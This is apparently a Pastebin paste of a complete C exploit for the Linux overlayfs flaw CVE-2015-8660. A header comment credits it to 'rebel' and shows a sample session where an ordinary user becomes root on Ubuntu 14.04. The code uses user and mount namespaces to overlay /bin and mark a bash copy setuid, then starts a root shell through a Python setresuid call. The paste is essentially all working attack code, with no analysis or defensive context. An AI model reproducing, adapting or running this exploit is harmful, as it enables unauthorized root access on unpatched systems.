API tools faq
paste
Guest User

Untitled

a guest
Dec 4th, 2016
74
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.72 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. just another overlayfs exploit, works on kernels before 2015-12-26
  3.  
  4. # Exploit Title: overlayfs local root
  5. # Date: 2016-01-05
  6. # Exploit Author: rebel
  7. # Version: Ubuntu 14.04 LTS, 15.10 and more
  8. # Tested on: Ubuntu 14.04 LTS, 15.10
  9. # CVE : CVE-2015-8660
  10.  
  11. blah@ubuntu:~$ id
  12. uid=1001(blah) gid=1001(blah) groups=1001(blah)
  13. blah@ubuntu:~$ uname -a && cat /etc/issue
  14. Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  15. Ubuntu 14.04.3 LTS \n \l
  16. blah@ubuntu:~$ ./overlayfail
  17. root@ubuntu:~# id
  18. uid=0(root) gid=1001(blah) groups=0(root),1001(blah)
  19.  
  20. 12/2015
  21. by rebel
  22.  
  23. 6354b4e23db225b565d79f226f2e49ec0fe1e19b
  24. */
  25.  
  26. #include <stdio.h>
  27. #include <sched.h>
  28. #include <stdlib.h>
  29. #include <unistd.h>
  30. #include <sched.h>
  31. #include <sys/stat.h>
  32. #include <sys/types.h>
  33. #include <sys/mount.h>
  34. #include <stdio.h>
  35. #include <stdlib.h>
  36. #include <unistd.h>
  37. #include <sched.h>
  38. #include <sys/stat.h>
  39. #include <sys/types.h>
  40. #include <sys/mount.h>
  41. #include <sys/types.h>
  42. #include <signal.h>
  43. #include <fcntl.h>
  44. #include <string.h>
  45. #include <linux/sched.h>
  46. #include <sys/wait.h>
  47.  
  48. static char child_stack[1024*1024];
  49.  
  50. static int
  51. child_exec(void *stuff)
  52. {
  53. system("rm -rf /tmp/haxhax");
  54. mkdir("/tmp/haxhax", 0777);
  55. mkdir("/tmp/haxhax/w", 0777);
  56. mkdir("/tmp/haxhax/u",0777);
  57. mkdir("/tmp/haxhax/o",0777);
  58.  
  59. if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
  60. fprintf(stderr,"mount failed..\n");
  61. }
  62.  
  63. chmod("/tmp/haxhax/w/work",0777);
  64. chdir("/tmp/haxhax/o");
  65. chmod("bash",04755);
  66. chdir("/");
  67. umount("/tmp/haxhax/o");
  68. return 0;
  69. }
  70.  
  71. int
  72. main(int argc, char **argv)
  73. {
  74. int status;
  75. pid_t wrapper, init;
  76. int clone_flags = CLONE_NEWNS | SIGCHLD;
  77. struct stat s;
  78.  
  79. if((wrapper = fork()) == 0) {
  80. if(unshare(CLONE_NEWUSER) != 0)
  81. fprintf(stderr, "failed to create new user namespace\n");
  82.  
  83. if((init = fork()) == 0) {
  84. pid_t pid =
  85. clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
  86. if(pid < 0) {
  87. fprintf(stderr, "failed to create new mount namespace\n");
  88. exit(-1);
  89. }
  90.  
  91. waitpid(pid, &status, 0);
  92.  
  93. }
  94.  
  95. waitpid(init, &status, 0);
  96. return 0;
  97. }
  98.  
  99. usleep(300000);
  100.  
  101. wait(NULL);
  102.  
  103. stat("/tmp/haxhax/u/bash",&s);
  104.  
  105. if(s.st_mode == 0x89ed)
  106. execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
  107.  
  108. fprintf(stderr,"couldn't create suid :(\n");
  109. return -1;
  110. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!